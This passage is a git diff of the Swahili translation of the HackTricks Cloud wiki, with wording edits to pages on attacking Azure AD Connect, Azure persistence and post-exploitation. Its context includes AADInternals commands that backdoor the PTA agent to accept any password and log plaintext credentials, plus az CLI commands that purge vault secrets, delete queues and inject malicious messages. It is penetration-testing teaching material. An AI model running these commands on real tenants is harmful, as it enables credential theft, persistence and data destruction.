diff --git a/.github/pull_request_template.md b/.github/pull_request_template.md index be51755ed..6971868fa 100644 --- a/.github/pull_request_template.md +++ b/.github/pull_request_template.md @@ -2,7 +2,7 @@ Tunathamini maarifa yako na kukuhimiza kushiriki maudhui. Tafadhali hakikisha unachapisha tu maudhui ambayo unamiliki au ambayo una ruhusa ya kuyashiriki kutoka kwa mwandishi wa asili (kuongeza rejea kwa mwandishi katika maandiko yaliyoongezwa au mwishoni mwa ukurasa unaobadilisha au vyote viwili). Heshima yako kwa haki za mali ya akili inakuza mazingira ya kushiriki ambayo ni ya kuaminika na kisheria kwa kila mtu. ## HackTricks Training -Ikiwa unongeza ili uweze kupita katika mtihani wa [ARTE certification](https://training.hacktricks.xyz/courses/arte) kwa bendera 2 badala ya 3, unahitaji kuita PR `arte-`. +Ikiwa unongeza ili uweze kupita mtihani wa [ARTE certification](https://training.hacktricks.xyz/courses/arte) kwa bendera 2 badala ya 3, unahitaji kuita PR `arte-`. Pia, kumbuka kwamba marekebisho ya sarufi/sintaksis hayatakubaliwa kwa kupunguza bendera za mtihani. diff --git a/src/README.md b/src/README.md index c51d8a491..d17ffe2e3 100644 --- a/src/README.md +++ b/src/README.md @@ -13,13 +13,13 @@ _Hacktricks logos & motion designed by_ [_@ppiernacho_](https://www.instagram.co ### **Pentesting CI/CD Methodology** -**Katika HackTricks CI/CD Methodology utaweza kuona jinsi ya pentest miundombinu inayohusiana na shughuli za CI/CD.** Soma ukurasa ufuatao kwa **utangulizi:** +**Katika HackTricks CI/CD Methodology utaweza kupata jinsi ya pentest miundombinu inayohusiana na shughuli za CI/CD.** Soma ukurasa ufuatao kwa **utangulizi:** [pentesting-ci-cd-methodology.md](pentesting-ci-cd/pentesting-ci-cd-methodology.md) ### Pentesting Cloud Methodology -**Katika HackTricks Cloud Methodology utaweza kuona jinsi ya pentest mazingira ya wingu.** Soma ukurasa ufuatao kwa **utangulizi:** +**Katika HackTricks Cloud Methodology utaweza kupata jinsi ya pentest mazingira ya wingu.** Soma ukurasa ufuatao kwa **utangulizi:** [pentesting-cloud-methodology.md](pentesting-cloud/pentesting-cloud-methodology.md) diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/README.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/README.md index 78b6d62f8..930bf371e 100644 --- a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/README.md +++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/README.md @@ -4,7 +4,7 @@ ## Basic Information -Ushirikiano kati ya **On-premises Active Directory (AD)** na **Azure AD** unarahisishwa na **Azure AD Connect**, ukitoa mbinu mbalimbali zinazosaidia **Single Sign-on (SSO)**. Kila mbinu, ingawa ni muhimu, ina hatari za usalama zinazoweza kutumiwa kuathiri mazingira ya wingu au ya ndani: +Ushirikiano kati ya **On-premises Active Directory (AD)** na **Azure AD** unarahisishwa na **Azure AD Connect**, ukitoa mbinu mbalimbali zinazosaidia **Single Sign-on (SSO)**. Kila mbinu, ingawa ni muhimu, ina uwezekano wa udhaifu wa usalama ambao unaweza kutumiwa kuathiri mazingira ya wingu au ya ndani: - **Pass-Through Authentication (PTA)**: - Uwezekano wa kuathiriwa kwa wakala kwenye AD ya ndani, kuruhusu uthibitishaji wa nywila za watumiaji kwa ajili ya muunganisho wa Azure (kutoka ndani hadi Wingu). @@ -15,7 +15,7 @@ pta-pass-through-authentication.md {{#endref}} - **Password Hash Sync (PHS)**: -- Uwezekano wa kutoa nywila za wazi za watumiaji wenye mamlaka kutoka AD, ikiwa ni pamoja na akidi za mtumiaji wa AzureAD aliyejengwa kwa mamlaka ya juu. +- Uwezekano wa kutoa nywila za wazi za watumiaji wenye mamlaka kutoka AD, ikiwa ni pamoja na akauti za mtumiaji wa AzureAD aliyejengwa kiotomatiki mwenye mamlaka ya juu. {{#ref}} phs-password-hash-sync.md @@ -36,7 +36,7 @@ seamless-sso.md {{#endref}} - **Cloud Kerberos Trust**: -- Uwezekano wa kupandisha kutoka kwa Global Admin hadi kwa Domain Admin wa ndani kwa kubadilisha majina ya watumiaji wa AzureAD na SIDs na kuomba TGTs kutoka AzureAD. +- Uwezekano wa kupanda kutoka kwa Global Admin hadi kwa On-prem Domain Admin kwa kubadilisha majina ya watumiaji wa AzureAD na SIDs na kuomba TGTs kutoka AzureAD. {{#ref}} az-cloud-kerberos-trust.md @@ -49,7 +49,7 @@ az-cloud-kerberos-trust.md az-default-applications.md {{#endref}} -Kwa kila mbinu ya ushirikiano, usawazishaji wa watumiaji unafanywa, na akaunti ya `MSOL_` inaundwa katika AD ya ndani. Kwa kuzingatia, mbinu zote mbili **PHS** na **PTA** zinasaidia **Seamless SSO**, kuruhusu kuingia kiotomatiki kwa kompyuta za Azure AD zilizounganishwa na eneo la ndani. +Kwa kila mbinu ya ushirikiano, usawazishaji wa watumiaji unafanywa, na akaunti ya `MSOL_` inaundwa katika AD ya ndani. Kwa kuzingatia, mbinu zote **PHS** na **PTA** zinasaidia **Seamless SSO**, kuruhusu kuingia kiotomatiki kwa kompyuta za Azure AD zilizounganishwa na kikoa cha ndani. Ili kuthibitisha usakinishaji wa **Azure AD Connect**, amri ifuatayo ya PowerShell, ikitumia moduli ya **AzureADConnectHealthSync** (iliyowekwa kwa chaguo-msingi na Azure AD Connect), inaweza kutumika: ```powershell diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.md index c36b39d9d..36020c097 100644 --- a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.md +++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.md @@ -6,7 +6,7 @@ [From the docs:](https://learn.microsoft.com/en-us/entra/identity/hybrid/connect/how-to-connect-pta) Azure Active Directory (Azure AD) Pass-through Authentication inaruhusu watumiaji wako **kuingia kwenye programu za ndani na za wingu wakitumia nywila sawa**. Kipengele hiki kinawapa watumiaji wako uzoefu bora - nywila moja kidogo ya kukumbuka, na hupunguza gharama za msaada wa IT kwa sababu watumiaji wako wana uwezekano mdogo wa kusahau jinsi ya kuingia. Wakati watumiaji wanaingia wakitumia Azure AD, kipengele hiki **kinathibitisha nywila za watumiaji moja kwa moja dhidi ya Active Directory yako ya ndani**. -Katika PTA **identities** zinahusishwa lakini **nywila** **hazihusishwi** kama katika PHS. +Katika PTA **vitambulisho** vinakuwa **vimeunganishwa** lakini **nywila** **hazijakubaliwa** kama ilivyo katika PHS. Uthibitishaji unathibitishwa katika AD ya ndani na mawasiliano na wingu yanafanywa na **wakala wa uthibitishaji** anayekimbia katika **seva ya ndani** (haipaswi kuwa kwenye DC ya ndani). @@ -14,41 +14,41 @@ Uthibitishaji unathibitishwa katika AD ya ndani na mawasiliano na wingu yanafany
-1. Ili **kuingia** mtumiaji anapelekwa kwenye **Azure AD**, ambapo anatumia **jina la mtumiaji** na **nywila** -2. **Taarifa za kuingia** zinahifadhiwa **kwa siri** na kuwekwa kwenye **foleni** katika Azure AD +1. Ili **kuingia** mtumiaji anarejeshwa kwa **Azure AD**, ambapo anatumia **jina la mtumiaji** na **nywila** +2. **Taarifa za kuingia** zinakuwa **zimefichwa** na kuwekwa kwenye **foleni** katika Azure AD 3. **Wakala wa uthibitishaji wa ndani** anakusanya **taarifa za kuingia** kutoka kwenye foleni na **kuzifungua**. Wakala huyu anaitwa **"Pass-through authentication agent"** au **PTA agent.** 4. **Wakala** **anathibitisha** taarifa dhidi ya **AD ya ndani** na anatumia **jibu** **kurudi** kwa Azure AD ambayo, ikiwa jibu ni chanya, **inakamilisha kuingia** kwa mtumiaji. > [!WARNING] > Ikiwa mshambuliaji **anashambulia** **PTA** anaweza **kuona** taarifa zote **za kuingia** kutoka kwenye foleni (katika **maandishi wazi**).\ -> Anaweza pia **kuhakiki taarifa zozote** kwa AzureAD (shambulio linalofanana na ufunguo wa Skeleton). +> Anaweza pia **kuhakiki taarifa zozote za kuingia** kwa AzureAD (shambulio linalofanana na ufunguo wa Skeleton). ### On-Prem -> cloud -Ikiwa una **ufikiaji wa admin** kwa **seva ya Azure AD Connect** yenye **wakala wa PTA** akifanya kazi, unaweza kutumia moduli ya **AADInternals** ku **ingiza nyuma ya mlango** ambayo it **athibitisha NYWILA ZOTE** zilizowekwa (hivyo nywila zote zitakuwa halali kwa uthibitishaji): +Ikiwa una **ufikiaji wa admin** kwa **seva ya Azure AD Connect** yenye **wakala wa PTA** anayekimbia, unaweza kutumia moduli ya **AADInternals** ku **ingiza nyuma ya mlango** ambayo it **athibitisha NYWILA ZOTE** zilizowekwa (hivyo nywila zote zitakuwa halali kwa uthibitishaji): ```powershell Install-AADIntPTASpy ``` > [!NOTE] > Ikiwa **ufungaji unashindwa**, hii inaweza kuwa kutokana na kukosekana kwa [Microsoft Visual C++ 2015 Redistributables](https://download.microsoft.com/download/6/A/A/6AA4EDFF-645B-48C5-81CC-ED5963AEAD48/vc_redist.x64.exe). -Pia inawezekana **kuona nywila za maandiko wazi zinazotumwa kwa wakala wa PTA** kwa kutumia cmdlet ifuatayo kwenye mashine ambapo nyuma ya mlango wa awali ilifungwa: +Pia inawezekana **kuona nywila za maandiko wazi zinazotumwa kwa wakala wa PTA** kwa kutumia cmdlet ifuatayo kwenye mashine ambapo nyuma ya mlango wa awali ilipowekwa: ```powershell Get-AADIntPTASpyLog -DecodePasswords ``` Hii backdoor itafanya: -- Kuunda folda ya siri `C:\PTASpy` +- Kuunda folda iliyofichwa `C:\PTASpy` - Nakala ya `PTASpy.dll` kwenye `C:\PTASpy` - Inajumuisha `PTASpy.dll` kwenye mchakato wa `AzureADConnectAuthenticationAgentService` > [!NOTE] -> Wakati huduma ya AzureADConnectAuthenticationAgent inapoanzishwa upya, PTASpy "imeondolewa" na inapaswa kusanikishwa tena. +> Wakati huduma ya AzureADConnectAuthenticationAgent inapoanzishwa upya, PTASpy "imeondolewa" na inapaswa kusakinishwa tena. ### Cloud -> On-Prem > [!CAUTION] -> Baada ya kupata **GA privileges** kwenye wingu, inawezekana **kujiandikisha wakala mpya wa PTA** kwa kuweka kwenye **kifaa kinachodhibitiwa na mshambuliaji**. Mara wakala anapokuwa **amewekwa**, tunaweza **kurudia** hatua **za awali** ili **kujiandikisha kwa kutumia nenosiri lolote** na pia, **kupata nenosiri kwa maandiko wazi.** +> Baada ya kupata **GA privileges** kwenye wingu, inawezekana **kujiandikisha wakala mpya wa PTA** kwa kuweka kwenye **kifaa kinachodhibitiwa na mshambuliaji**. Mara wakala anapokuwa **amewekwa**, tunaweza **kurudia** hatua za **awali** ili **kujiandikisha kwa kutumia nenosiri lolote** na pia, **kupata nenosiri kwa maandiko wazi.** ### Seamless SSO diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/seamless-sso.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/seamless-sso.md index 05e577a14..b325b6aaf 100644 --- a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/seamless-sso.md +++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/seamless-sso.md @@ -70,7 +70,7 @@ Ili kutumia tiketi ya fedha, hatua zifuatazo zinapaswa kutekelezwa: > [!TIP] > Hii haipuuzi MFA ikiwa imewezeshwa -#### Chaguo la 2 bila dcsync - SeamlessPass +#### Chaguo 2 bila dcsync - SeamlessPass Pia inawezekana kufanya shambulio hili **bila shambulio la dcsync** ili kuwa na siri zaidi kama [ilivyoelezwa katika chapisho hili la blog](https://malcrove.com/seamlesspass-leveraging-kerberos-tickets-to-access-the-cloud/). Kwa hiyo unahitaji tu moja ya yafuatayo: @@ -87,10 +87,10 @@ Taarifa zaidi za kuweka Firefox kufanya kazi na seamless SSO zinaweza [**kupatik #### ~~Kuunda tiketi za Kerberos kwa watumiaji wa wingu pekee~~ -Ikiwa wasimamizi wa Active Directory wana ufikiaji wa Azure AD Connect, wanaweza **kweka SID kwa mtumiaji yeyote wa wingu**. Kwa njia hii tiketi za Kerberos **zinaweza kuundwa pia kwa watumiaji wa wingu pekee**. Sharti pekee ni kwamba SID iwe [SID]() sahihi. +Ikiwa wasimamizi wa Active Directory wana ufikiaji wa Azure AD Connect, wanaweza **kweka SID kwa mtumiaji yeyote wa wingu**. Kwa njia hii, tiketi za Kerberos **zinaweza kuundwa pia kwa watumiaji wa wingu pekee**. Sharti pekee ni kwamba SID iwe [SID]() sahihi. > [!CAUTION] -> Kubadilisha SID ya watumiaji wa usimamizi wa wingu pekee sasa **imezuiwa na Microsoft**.\ +> Kubadilisha SID ya watumiaji wa usimamizi wa wingu pekee sasa **kumezuiwa na Microsoft**.\ > Kwa maelezo zaidi angalia [https://aadinternals.com/post/on-prem_admin/](https://aadinternals.com/post/on-prem_admin/) ### On-prem -> Wingu kupitia Uwakilishi wa Rasilimali ulio na Mipaka @@ -99,7 +99,7 @@ Mtu yeyote anayeweza kusimamia akaunti za kompyuta (`AZUREADSSOACC$`) katika kon ```python python rbdel.py -u \\ -p azureadssosvc$ ``` -## Marejeleo +## Marejeo - [https://learn.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-sso](https://learn.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-sso) - [https://www.dsinternals.com/en/impersonating-office-365-users-mimikatz/](https://www.dsinternals.com/en/impersonating-office-365-users-mimikatz/) diff --git a/src/pentesting-cloud/azure-security/az-persistence/README.md b/src/pentesting-cloud/azure-security/az-persistence/README.md index 49999c911..88f2299f3 100644 --- a/src/pentesting-cloud/azure-security/az-persistence/README.md +++ b/src/pentesting-cloud/azure-security/az-persistence/README.md @@ -10,7 +10,7 @@ Zaidi ya hayo, unaweza pia kukubali programu hiyo kwa mtumiaji wako kama njia ya ### Applications and Service Principals -Kwa ruhusa za Msimamizi wa Programu, GA au jukumu la kawaida lenye ruhusa microsoft.directory/applications/credentials/update, tunaweza kuongeza akidi (siri au cheti) kwa programu iliyopo. +Kwa ruhusa za Msimamizi wa Programu, GA au jukumu la kawaida lenye ruhusa microsoft.directory/applications/credentials/update, tunaweza kuongeza akreditivu (siri au cheti) kwa programu iliyopo. Inawezekana **kulenga programu yenye ruhusa kubwa** au **kuongeza programu mpya** yenye ruhusa kubwa. @@ -28,7 +28,7 @@ Connect-AzAccount -ServicePrincipal -Tenant -CertificateThumbprint --account-name @@ -20,7 +20,7 @@ az storage queue metadata update --name --metadata key1=value1 key2 az storage queue policy set --name --permissions rwd --expiry 2024-12-31T23:59:59Z --account-name ``` -## Marejeleo +## Marejeo - https://learn.microsoft.com/en-us/azure/storage/queues/storage-powershell-how-to-use-queues - https://learn.microsoft.com/en-us/rest/api/storageservices/queue-service-rest-api diff --git a/src/pentesting-cloud/azure-security/az-persistence/az-storage-persistence.md b/src/pentesting-cloud/azure-security/az-persistence/az-storage-persistence.md index 2bd1d6175..76baeaa1f 100644 --- a/src/pentesting-cloud/azure-security/az-persistence/az-storage-persistence.md +++ b/src/pentesting-cloud/azure-security/az-persistence/az-storage-persistence.md @@ -14,11 +14,11 @@ Kwa maelezo zaidi kuhusu uhifadhi angalia: - Hifadhi funguo za ufikiaji - Tengeneza SAS -- Mtumiaji aliyetengwa ni siku 7 tu +- Watumiaji walipewa mamlaka ni siku 7 tu ### Microsoft.Storage/storageAccounts/blobServices/containers/update && Microsoft.Storage/storageAccounts/blobServices/deletePolicy/write -Ruhusa hizi zinamruhusu mtumiaji kubadilisha mali za huduma ya blob kwa kipengele cha uhifadhi wa kufutwa, ambacho kinawaruhusu au kuunda kipindi cha uhifadhi kwa kontena zilizofutwa. Ruhusa hizi zinaweza kutumika kudumisha kudumu ili kutoa fursa kwa mshambuliaji kurejesha au kubadilisha kontena zilizofutwa ambazo zinapaswa kuwa zimeondolewa kabisa na kufikia taarifa nyeti. +Ruhusa hizi zinamruhusu mtumiaji kubadilisha mali za huduma ya blob kwa kipengele cha uhifadhi wa kufutwa, ambacho kinamwezesha au kuunda kipindi cha uhifadhi kwa kontena zilizofutwa. Ruhusa hizi zinaweza kutumika kwa kudumisha kudumu ili kutoa fursa kwa mshambuliaji kurejesha au kubadilisha kontena zilizofutwa ambazo zinapaswa kuwa zimeondolewa kabisa na kufikia taarifa nyeti. ```bash az storage account blob-service-properties update \ --account-name \ diff --git a/src/pentesting-cloud/azure-security/az-post-exploitation/az-function-apps-post-exploitation.md b/src/pentesting-cloud/azure-security/az-post-exploitation/az-function-apps-post-exploitation.md index f780cf40b..acee48dd7 100644 --- a/src/pentesting-cloud/azure-security/az-post-exploitation/az-function-apps-post-exploitation.md +++ b/src/pentesting-cloud/azure-security/az-post-exploitation/az-function-apps-post-exploitation.md @@ -10,7 +10,7 @@ Kwa maelezo zaidi kuhusu function apps angalia: ../az-services/az-function-apps.md {{#endref}} -> [!CAUTION] > **Hila za post exploitation za Function Apps zinahusiana sana na hila za kupandisha hadhi** hivyo unaweza kuziona zote huko: +> [!CAUTION] > **Hila za post exploitation za Function Apps zina uhusiano mkubwa na hila za kupandisha hadhi** hivyo unaweza kuziona zote huko: {{#ref}} ../az-privilege-escalation/az-functions-app-privesc.md diff --git a/src/pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.md b/src/pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.md index 47930b85c..3c22ef138 100644 --- a/src/pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.md +++ b/src/pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.md @@ -21,13 +21,13 @@ az keyvault secret show --id https://.vault.azure.net/secrets/ --name ``` ### **Microsoft.KeyVault/vaults/keys/encrypt/action** -Ruhusa hii inaruhusu mhusika kuficha data kwa kutumia funguo iliyohifadhiwa katika vault. +Ruhusa hii inaruhusu mhusika kuficha data kwa kutumia ufunguo uliohifadhiwa katika vault. ```bash az keyvault key encrypt --vault-name --name --algorithm --value @@ -46,37 +46,37 @@ az keyvault key decrypt --vault-name testing-1231234 --name testing --algorithm ``` ### **Microsoft.KeyVault/vaults/keys/purge/action** -Ruhusa hii inaruhusu mhusika kufuta funguo kwa kudumu kutoka kwenye vault. +Ruhusa hii inaruhusu mtu mwenye mamlaka kufuta funguo kwa kudumu kutoka kwenye vault. ```bash az keyvault key purge --vault-name --name ``` ### **Microsoft.KeyVault/vaults/secrets/purge/action** -Ruhusa hii inaruhusu mhusika kufuta kwa kudumu siri kutoka kwenye vault. +Ruhusa hii inaruhusu mhusika kufuta siri kwa kudumu kutoka kwenye vault. ```bash az keyvault secret purge --vault-name --name ``` ### **Microsoft.KeyVault/vaults/secrets/setSecret/action** -Ruhusa hii inaruhusu mhusika kuunda au kuboresha siri katika vault. +Ruhusa hii inaruhusu kiongozi kuunda au kuboresha siri katika vault. ```bash az keyvault secret set --vault-name --name --value ``` ### **Microsoft.KeyVault/vaults/certificates/delete** -Ruhusa hii inaruhusu kiongozi kufuta cheti kutoka kwenye vault. Cheti kinahamishwa kwenye hali ya "soft-delete", ambapo kinaweza kurejeshwa isipokuwa kimeondolewa kabisa. +Ruhusa hii inaruhusu mhusika kufuta cheti kutoka kwenye vault. Cheti kinahamishwa kwenye hali ya "soft-delete", ambapo kinaweza kurejeshwa isipokuwa kimeondolewa kabisa. ```bash az keyvault certificate delete --vault-name --name ``` ### **Microsoft.KeyVault/vaults/keys/delete** -Ruhusa hii inaruhusu kiongozi kufuta funguo kutoka kwenye vault. Funguo inahamishwa kwenye hali ya "soft-delete", ambapo inaweza kurejeshwa isipokuwa ikifutwa. +Ruhusa hii inaruhusu mhusika kufuta funguo kutoka kwenye vault. Funguo inahamishwa kwenye hali ya "soft-delete", ambapo inaweza kurejeshwa isipokuwa ikifutwa. ```bash az keyvault key delete --vault-name --name ``` ### **Microsoft.KeyVault/vaults/secrets/delete** -Ruhusa hii inaruhusu mhusika kufuta siri kutoka kwenye vault. Siri inahamishwa kwenye hali ya "soft-delete", ambapo inaweza kurejeshwa isipokuwa ikifutwa. +Ruhusa hii inaruhusu kiongozi kufuta siri kutoka kwenye vault. Siri inahamishwa kwenye hali ya "soft-delete", ambapo inaweza kurejeshwa isipokuwa ikifutwa. ```bash az keyvault secret delete --vault-name --name ``` diff --git a/src/pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.md b/src/pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.md index cb7fd2f67..dc58f4bb0 100644 --- a/src/pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.md +++ b/src/pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.md @@ -12,7 +12,7 @@ Kwa maelezo zaidi angalia: ### DataActions: `Microsoft.Storage/storageAccounts/queueServices/queues/messages/read` -Mshambuliaji mwenye ruhusa hii anaweza kuangalia ujumbe kutoka kwa Azure Storage Queue. Hii inamruhusu mshambuliaji kuona maudhui ya ujumbe bila kuashiria kuwa yamechakatwa au kubadilisha hali yao. Hii inaweza kusababisha ufikiaji usioidhinishwa wa taarifa nyeti, ikiruhusu uhamasishaji wa data au kukusanya taarifa kwa mashambulizi zaidi. +Mshambuliaji mwenye ruhusa hii anaweza kuangalia ujumbe kutoka kwa Azure Storage Queue. Hii inamruhusu mshambuliaji kuona maudhui ya ujumbe bila kuashiria kuwa umeshughulikiwa au kubadilisha hali yao. Hii inaweza kusababisha ufikiaji usioidhinishwa wa taarifa nyeti, ikiruhusu uhamasishaji wa data au kukusanya taarifa kwa mashambulizi zaidi. ```bash az storage message peek --queue-name --account-name ``` @@ -20,7 +20,7 @@ az storage message peek --queue-name --account-name --account-name ``` @@ -32,7 +32,7 @@ az storage message put --queue-name --content "Injected malicious m ``` ### DataActions: `Microsoft.Storage/storageAccounts/queueServices/queues/messages/write` -Ruhusa hii inamruhusu mshambuliaji kuongeza ujumbe mpya au kuboresha wale waliopo katika Azure Storage Queue. Kwa kutumia hii, wanaweza kuingiza maudhui mabaya au kubadilisha ujumbe waliopo, ambayo yanaweza kuongoza programu vibaya au kusababisha tabia zisizohitajika katika mifumo inayotegemea foleni. +Ruhusa hii inamruhusu mshambuliaji kuongeza ujumbe mpya au kuboresha wale waliopo katika Azure Storage Queue. Kwa kutumia hii, wanaweza kuingiza maudhui mabaya au kubadilisha ujumbe waliopo, ambayo yanaweza kupelekea upotoshaji wa programu au kusababisha tabia zisizohitajika katika mifumo inayotegemea foleni. ```bash az storage message put --queue-name --content "Injected malicious message" --account-name @@ -46,19 +46,19 @@ az storage message update --queue-name \ ``` ### Actions: `Microsoft.Storage/storageAccounts/queueServices/queues/delete` -Ruhusa hii inaruhusu mshambuliaji kufuta foleni ndani ya akaunti ya hifadhi. Kwa kutumia uwezo huu, mshambuliaji anaweza kuondoa kwa kudumu foleni na ujumbe wao wote waliounganishwa, na kusababisha usumbufu mkubwa katika michakato na kusababisha kupoteza kwa data muhimu kwa programu zinazotegemea foleni zilizoathiriwa. Kitendo hiki kinaweza pia kutumika kuharibu huduma kwa kuondoa vipengele muhimu vya mfumo. +Ruhusa hii inamruhusu mshambuliaji kufuta foleni ndani ya akaunti ya hifadhi. Kwa kutumia uwezo huu, mshambuliaji anaweza kuondoa kwa kudumu foleni na ujumbe wao wote waliounganishwa, na kusababisha usumbufu mkubwa katika michakato na kusababisha kupoteza kwa data muhimu kwa programu zinazotegemea foleni zilizoathirika. Kitendo hiki kinaweza pia kutumika kuharibu huduma kwa kuondoa vipengele muhimu vya mfumo. ```bash az storage queue delete --name --account-name ``` ### DataActions: `Microsoft.Storage/storageAccounts/queueServices/queues/messages/delete` -Kwa ruhusa hii, mshambuliaji anaweza kufuta ujumbe wote kutoka kwa Azure Storage Queue. Kitendo hiki kinafuta ujumbe wote, kinaharibu mchakato wa kazi na kusababisha kupoteza data kwa mifumo inayotegemea foleni hiyo. +Kwa ruhusa hii, mshambuliaji anaweza kufuta ujumbe wote kutoka kwa Azure Storage Queue. Kitendo hiki kinafuta ujumbe wote, kinaharibu mchakato wa kazi na kusababisha kupoteza data kwa mifumo inayotegemea foleni. ```bash az storage message clear --queue-name --account-name ``` ### Actions: `Microsoft.Storage/storageAccounts/queueServices/queues/write` -Ruhusa hii inaruhusu mshambuliaji kuunda au kubadilisha foleni na mali zao ndani ya akaunti ya hifadhi. Inaweza kutumika kuunda foleni zisizoidhinishwa, kubadilisha metadata, au kubadilisha orodha za udhibiti wa ufikiaji (ACLs) ili kutoa au kupunguza ufikiaji. Uwezo huu unaweza kuharibu mchakato wa kazi, kuingiza data mbaya, kuhamasisha taarifa nyeti, au kubadilisha mipangilio ya foleni ili kuwezesha mashambulizi zaidi. +Ruhusa hii inaruhusu mshambuliaji kuunda au kubadilisha foleni na mali zao ndani ya akaunti ya hifadhi. Inaweza kutumika kuunda foleni zisizoidhinishwa, kubadilisha metadata, au kubadilisha orodha za udhibiti wa ufikiaji (ACLs) ili kutoa au kupunguza ufikiaji. Uwezo huu unaweza kuharibu michakato, kuingiza data mbaya, kuhamasisha taarifa nyeti, au kubadilisha mipangilio ya foleni ili kuwezesha mashambulizi zaidi. ```bash az storage queue create --name --account-name @@ -66,7 +66,7 @@ az storage queue metadata update --name --metadata key1=value1 key2 az storage queue policy set --name --permissions rwd --expiry 2024-12-31T23:59:59Z --account-name ``` -## Marejeleo +## Marejeo - https://learn.microsoft.com/en-us/azure/storage/queues/storage-powershell-how-to-use-queues - https://learn.microsoft.com/en-us/rest/api/storageservices/queue-service-rest-api diff --git a/src/pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.md b/src/pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.md index 04b9606af..149643f91 100644 --- a/src/pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.md +++ b/src/pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.md @@ -18,7 +18,7 @@ az servicebus namespace delete --resource-group --name --namespace-name --name ``` @@ -36,21 +36,21 @@ az servicebus topic subscription delete --resource-group --n ``` ### Actions: `Microsoft.ServiceBus/namespaces/write` & `Microsoft.ServiceBus/namespaces/read` -Mshambuliaji mwenye ruhusa za kuunda au kubadilisha Azure Service Bus namespaces anaweza kutumia hii kuharibu shughuli, kupeleka rasilimali zisizoidhinishwa, au kufichua data nyeti. Wanaweza kubadilisha mipangilio muhimu kama vile kuwezesha ufikiaji wa mtandao wa umma, kupunguza mipangilio ya usimbuaji, au kubadilisha SKUs ili kupunguza utendaji au kuongeza gharama. Zaidi ya hayo, wanaweza kuzima uthibitishaji wa ndani, kubadilisha maeneo ya nakala, au kurekebisha toleo la TLS ili kupunguza udhibiti wa usalama, na kufanya makosa ya usanidi wa namespace kuwa hatari kubwa baada ya kutekeleza. +Mshambuliaji mwenye ruhusa za kuunda au kubadilisha Azure Service Bus namespaces anaweza kutumia hii kuharibu shughuli, kupeleka rasilimali zisizoidhinishwa, au kufichua data nyeti. Wanaweza kubadilisha mipangilio muhimu kama vile kuwezesha ufikiaji wa mtandao wa umma, kupunguza mipangilio ya usimbuaji, au kubadilisha SKUs ili kudhoofisha utendaji au kuongeza gharama. Zaidi ya hayo, wanaweza kuzima uthibitishaji wa ndani, kubadilisha maeneo ya nakala, au kurekebisha toleo la TLS ili kudhoofisha udhibiti wa usalama, na kufanya makosa ya usanidi wa namespace kuwa hatari kubwa baada ya kutekeleza. ```bash az servicebus namespace create --resource-group --name --location az servicebus namespace update --resource-group --name --tags ``` ### Actions: `Microsoft.ServiceBus/namespaces/queues/write` (`Microsoft.ServiceBus/namespaces/queues/read`) -Mshambuliaji mwenye ruhusa za kuunda au kubadilisha Azure Service Bus queues (ili kubadilisha foleni unahitaji pia Action:`Microsoft.ServiceBus/namespaces/queues/read`) anaweza kutumia hii kukamata data, kuharibu workflows, au kuwezesha ufikiaji usioidhinishwa. Wanaweza kubadilisha mipangilio muhimu kama vile kupeleka ujumbe kwa maeneo mabaya, kubadilisha TTL ya ujumbe ili kuhifadhi au kufuta data vibaya, au kuwezesha dead-lettering kuingilia kati usimamizi wa makosa. Zaidi ya hayo, wanaweza kubadilisha saizi za foleni, muda wa kufunga, au hali ili kuharibu utendaji wa huduma au kuepuka kugunduliwa, na kufanya hii kuwa hatari kubwa baada ya kutekeleza. +Mshambuliaji mwenye ruhusa za kuunda au kubadilisha Azure Service Bus queues (ili kubadilisha queue unahitaji pia Action:`Microsoft.ServiceBus/namespaces/queues/read`) anaweza kutumia hii kukamata data, kuharibu workflows, au kuwezesha ufikiaji usioidhinishwa. Wanaweza kubadilisha mipangilio muhimu kama vile kupeleka ujumbe kwa maeneo mabaya, kubadilisha TTL ya ujumbe ili kuhifadhi au kufuta data vibaya, au kuwezesha dead-lettering kuingilia kati usimamizi wa makosa. Zaidi ya hayo, wanaweza kubadilisha saizi za queue, muda wa kufunga, au hali ili kuharibu utendaji wa huduma au kuepuka kugunduliwa, na kufanya hii kuwa hatari kubwa baada ya kutekeleza. ```bash az servicebus queue create --resource-group --namespace-name --name az servicebus queue update --resource-group --namespace-name --name ``` ### Actions: `Microsoft.ServiceBus/namespaces/topics/write` (`Microsoft.ServiceBus/namespaces/topics/read`) -Mshambuliaji mwenye ruhusa za kuunda au kubadilisha mada (ili kubadilisha 